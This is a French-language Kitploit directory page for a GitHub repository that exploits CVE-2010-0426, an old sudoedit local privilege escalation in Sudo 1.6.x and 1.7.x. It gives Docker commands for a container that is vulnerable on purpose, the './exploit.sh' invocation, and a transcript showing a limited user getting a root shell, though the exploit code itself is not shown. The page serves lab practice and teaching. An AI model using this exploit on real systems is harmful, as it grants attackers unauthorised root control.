Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
privesc-CVE-2010-0426 — Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Élévation de privilèges locale et conteneur vulnérable | Kitploit
Outils/GitHubGitHub/t0kx/privesc-cve-2010-0426
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubt0kx/privesc-cve-2010-0426

privesc-CVE-2010-0426

Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Élévation de privilèges locale et conteneur vulnérable

Voir le dépôt
11139il y a 8 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Sudo 1.6.x<=1.6.9p21 et 1.7.x<=1.7.2p4 Élévation de privilèges locale

Sudo (su « do ») permet à un administrateur système d'accorder à certains utilisateurs (ou groupes d'utilisateurs) la possibilité d'exécuter certaines (ou toutes) commandes en tant que root tout en enregistrant toutes les commandes et arguments.

Environnement vulnérable

Pour configurer un environnement vulnérable pour votre test, vous aurez besoin de Docker installé, et exécutez simplement la commande suivante :

docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426

Et cela générera un shell interactif avec des privilèges d'utilisateur limités.

Code vulnérable

Le bug a été trouvé dans sudoedit, qui ne gère pas correctement la commande 'sudoedit', ce qui permet à un utilisateur malveillant de remplacer la commande sudoedit réelle par une commande arbitraire.

Des attaquants locaux pourraient exploiter ce problème pour exécuter des commandes arbitraires en tant qu'utilisateur 'root'. Des exploits réussis peuvent compromettre complètement un ordinateur affecté.

Exploit

Pour exploiter cette cible, exécutez simplement :

./exploit.sh

Si vous utilisez cette image vulnérable, vous pouvez simplement exécuter :

user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
	(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#

Crédits

Cette faille a été découverte par Slouching.

Avertissement

Ce programme ou les précédents sont uniquement à des fins éducatives. Ne l'utilisez pas sans autorisation. La clause de non-responsabilité habituelle s'applique, en particulier le fait que moi (t0kx) ne suis pas responsable des dommages causés par l'utilisation directe ou indirecte des informations ou fonctionnalités fournies par ces programmes. L'auteur ou tout fournisseur d'accès Internet ne porte AUCUNE responsabilité quant au contenu ou à l'utilisation abusive de ces programmes ou de leurs dérivés. En utilisant ces programmes, vous acceptez le fait que tout dommage (perte de données, crash du système, compromission du système, etc.) causé par l'utilisation de ces programmes n'est pas de la responsabilité de t0kx.

Télécharger l’outil